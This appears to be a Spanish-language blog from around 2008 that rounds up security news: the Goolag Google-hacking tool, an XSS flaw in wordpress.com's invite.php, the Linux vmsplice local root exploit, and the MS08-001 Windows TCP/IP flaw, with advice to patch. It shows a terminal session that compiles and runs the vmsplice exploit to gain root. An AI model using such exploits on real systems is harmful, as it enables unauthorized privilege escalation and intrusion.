Leyendo unos de los blogs que acostumbro a leer me encuentro con un post antiguo pero interesante, se trata de un post donde cuentan de una herramienta tipo google que sirve para scannear vulnerabilidades. En el post ponen esto
Goolag es una aplicación gratuita de escritorio (por ahora sólo para Windows) que automatiza la técnica denominada como “Google hacking”, pues precisamente aprovecha la potencia de dicho buscador para encontrar vulnerabilidades y documentos sensibles alojados en sitios web.
Dan la aclaracion que el usuario puede resultar baneado ya que su IP. queda guardada en el servidor que se esta scanneando y pueden llegar a banear la IP.
La herramienta se mira interesante para probarla los creadores de esa herramienta son los famosos hackers del grupo : “The cult of the Dead Cow”.
encontrada @ Heise
En un post de hace casi un mes me doy cuenta que los blogs alojados en wordpress.com son vulnerables a XSS. En este post explican detalladamente como usar el exploit. Ademas explican en un video como es que funciona el exploit.
Ultimamente se han visto muchos ataques a blogs y este viene a ser parte de esos, solo que este es para cualquier tipo de blog no necesariamente tienen que ser blogs en español.
Los blogs que no son vulnerabels son los de wordpress.org, ya que no usan el invite.php que es por donde se ataca con el exploit. Ademas el exploit afecta tambien las versiones 2.3.3 asi que no se salvan ni de la ultima version. Lo mejor sera tener cuidado de que correos les llegan para que no les roben las cookies y tengan acceso a sus blogs.
Ademas hay algo que me llamo la atencion que esta publicado en este post, que el exploit puede ser usado por un gusano para comprometer miles de blogs alojados en wordpress.com.
Un exploit interesante ha salido para ubuntu y debaian, el exploit tiene q ejecutarse localmente para tener acceso de root en el sistema.
Los Kernel Linux afectados son desde la versión 2.6.17 hasta 2.6.24.1. Por el momento para solucionar el problema de seguridad, habrÃa que compilar nuestro propio kernel eliminando vmsplice.
Los exploits funcionan perfectamente y pueden verlos aqui exploit y este otro.
En seguinfo han probado el exploit y les ha funcionado perfectamente. aqui esta el ejemplo
Kernel 2.6.22-14-generic:
$ gcc exploit.c -o exploit
$ whoami
heikki
$ ./exploit
——-
——-——-——-——-
Linux vmsplice Local Root Exploit
By qaaz
——-——-——-——-——-
[+] mmap: 0×0 .. 0×1000
[+] page: 0×0
[+] page: 0×20
[+] mmap: 0×4000 .. 0×5000
[+] page: 0×4000
[+] page: 0×4020
[+] mmap: 0×1000 .. 0×2000
[+] page: 0×1000
[+] mmap: 0xb7d90000 .. 0xb7dc2000
[+] root
$ whoami
root
Se ve que hasta el software libre tiene sus problemas, pero es mejor que Windows claro.
Ya esta tambien el parche para solucionar el problema y tambien se puede actualizar el Kernel consiguiendo aqui nueva versión del kernel (2.6.24.2) con el bug resuelto
El primer exploit para windows del 2008 ha salido, al parecer el exploit afecta una vulnerabilidad critica en el sistema operativo.
El problema afecta el procesamiento del Protocolo de control de transmisión / Protocolo de Internet (TCP/IP), un conjunto de protocolos de comunicaciones que se usan para transmitir datos a través de las redes.
Segun dicen el atacante al efectuar el ataque puede llegar a tener el control completo del sistema y tambien instalar software y creacion de nuevas cuentas de usuarios.
Lo unico que se recomienda es actualizar el sistema con el parche de boletÃn MS08-001. lo mas pronto posible.
